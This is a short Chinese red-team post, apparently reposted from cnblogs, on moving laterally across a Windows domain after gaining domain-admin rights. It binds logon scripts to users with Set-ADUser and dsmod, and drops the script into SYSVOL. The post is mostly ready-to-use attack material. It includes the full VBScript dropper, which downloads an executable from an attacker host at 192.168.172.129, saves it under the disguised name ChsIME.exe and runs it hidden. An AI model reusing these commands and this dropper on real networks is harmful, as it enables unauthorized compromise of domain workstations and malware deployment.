.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
0x1、利用场景
当获取到域控权限或domain admin等高权限时,想横向到域内PC主机上对方开启了防火墙,无法通过445、135进行横向利用,可以通过登录脚本绑定的方式获取目标主机权限。
0x2、利用方法
方法一、powershell win2012及以上自带,获取当前域用户信息
Get-ADUser -Filter * -Properties * | sort LastLogonDate | select name,mail,DistinguishedName,LastLogonDate | Export-Csv -Path C:\Users\Public\Documents\user.csv -Encoding utf8
绑定指定用户
Set-ADUser -Identity zhangsan -ScriptPath "download.vbs"
解绑
Set-ADUser -Identity zhangsan -ScriptPath " "
方法二、利用dsmod进行绑定
dsmod user -loscr "download.vbs" "CN=john,CN=Users,DC=redteam,DC=com"
解绑
dsmod user -loscr "" "CN=john,CN=Users,DC=redteam,DC=com"
刷新组策略
shell gpupdate /force
VBS内容
strFileURL = "http://192.168.172.129:82/logo.ico"strHDLocation = "C:\Users\Public\Documents\ChsIME.exe"Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")objXMLHTTP.open "GET", strFileURL, falseobjXMLHTTP.send()If objXMLHTTP.Status = 200 ThenSet objADOStream = CreateObject("ADODB.Stream")objADOStream.OpenobjADOStream.Type = 1 'adTypeBinaryobjADOStream.Write objXMLHTTP.ResponseBodyobjADOStream.Position = 0'Set the stream position to the startSet objFSO = Createobject("Scripting.FileSystemObject")If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocationSet objFSO = NothingobjADOStream.SaveToFile strHDLocationobjADOStream.CloseSet objADOStream = NothingEnd ifSet objXMLHTTP = NothingstrComputer = "."set ws=wscript.createobject("wscript.shell")val=ws.run ("C:\Users\Public\Documents\ChsIME.exe",0)上传至dc c:\windows\SYSVOL\sysvol\redteam.com\SCRIPTS\目录下,通过方法一或方法二进行绑定后刷新组策略即可
https://www.cnblogs.com/websecyw/p/16657762.html